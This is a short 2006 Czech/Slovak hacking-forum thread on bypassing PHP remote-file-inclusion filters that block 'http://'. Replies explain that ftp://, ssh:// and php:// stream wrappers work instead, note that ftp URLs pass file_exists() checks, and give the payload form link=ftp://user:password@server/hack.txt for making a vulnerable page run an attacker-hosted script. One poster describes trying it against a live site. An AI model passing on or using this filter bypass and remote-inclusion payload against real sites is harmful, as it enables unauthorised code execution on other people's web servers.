PHP injection cez ftp ?

HackForum

PHP injection cez ftp ?#
zdravim , je hromada stranok ktore sa proti php injection brani tak ze ak je c $_GET premennej http:// tak to bloknu...a ja sa pytam ci by sa to nedalo napr. cez ftp:// ? Nieco som skusal ale moc to neslo.
(odpovědět)
php injektor | 195.91.64.*19.12.2006 20:22
re: PHP injection cez ftp ?#
jo, da se to i pres ftp:// (i ssh://, i php:// atd...). vyhoda pouziti ftp je hlavne v tom, ze ftp streamy maji implementovanou "stat" operaci, takze takove url projde i pres file_exists().
(odpovědět)
kve | 82.208.44.*19.12.2006 21:42
re: PHP injection cez ftp ?#
Našel jsem stránku kdy to pujde přez ftp, ale když upravim url na nejakastranka.cz/index.php?link=[link] tak na mně vylétne okno na přihlášení k ftp. Vyzkoušel jsem tam zadat jméno a heslo od jednoho mého účtu a ono mne to zobrazilo moje soubory ale v panelu adresy byla stranka na kterou jsem utočil. (ten web, i muj ucet jsou na wz)
Jak to udělat aby to provedlo muj script?
(odpovědět)
.chaoz. | 82.100.62.*19.12.2006 22:23
re: PHP injection cez ftp ?#
.chaoz.: zkus to link=uzivatel:heslo@server
(odpovědět)
Dark Craft | PGP19.12.2006 22:43
re: PHP injection cez ftp ?#
samozrejme nesmis zapomenout na protokol takze link=ftp://uzivatel:heslo@server
(odpovědět)
Dark Craft | PGP19.12.2006 23:10
re: PHP injection cez ftp ?#
teda ak by som mal stranku s php injection chybou tak by to mohlo vyzerat nasledovne ?
[link]
ftp://user:ped@nieco.ic.cz/hack.txt ???
(odpovědět)
php injektor | 195.91.64.*25.12.2006 23:57

Zpět
 
 
 

 
BBCode